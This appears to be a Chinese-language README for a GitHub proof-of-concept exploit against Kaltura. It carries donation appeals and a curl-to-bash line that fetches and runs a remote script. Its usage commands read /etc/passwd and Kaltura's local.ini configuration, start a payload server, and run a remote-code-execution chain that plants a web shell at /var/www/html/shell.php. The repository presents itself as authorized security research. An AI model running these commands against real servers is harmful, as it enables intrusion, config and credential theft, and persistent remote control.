帮助维护此项目如果您觉得此项目有用,请考虑通过 PayPal 或 ABA Mobile 支持其持续维护。 ❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។ ❤️ 每笔捐赠的百分之十将捐献给甘塔博帕儿童医院。 |
选择支付方式
使用 ABA Mobile 扫描 · 点击放大 |
直接从 GitHub 运行最新版本的外部下载脚本:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
此命令需要 Bash 和
curl。如果您不信任该来源,请在运行前查看远程脚本。
仅在安全且授权的环境中使用此项目,例如:
示例设置:
git clone <repository-url>
cd <repository-name>
# 项目使用 Python,请按以下步骤操作
# 创建虚拟环境
python -m venv venv
# 激活虚拟环境
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# 安装依赖
pip install -r requirements.txt
示例用法:
# 1. 文件读取(最可靠,按文章中描述的方式工作)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. 仅启动载荷服务器(配合 Burp / curl 手动使用)
python3 kaltura_poc.py serve --lport 8888
# 3. 完整攻击链框架
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
本仓库仅用于教育和授权的安全研究。
它旨在帮助用户了解:
仅在您拥有权限的环境中使用本仓库,例如:
严禁未经授权或非法使用。
作者和贡献者不对因本项目造成的任何损害、滥用、法律问题或损失负责。
使用本仓库即表示您同意:
本项目旨在用于:
请遵循负责任披露实践,并遵守所有适用法律。
如需负责任披露或合作,请通过 GitHub 联系仓库维护者。
探索 PoC CVE 集合,获取更多用于授权安全研究和教育的 CVE 概念验证资源。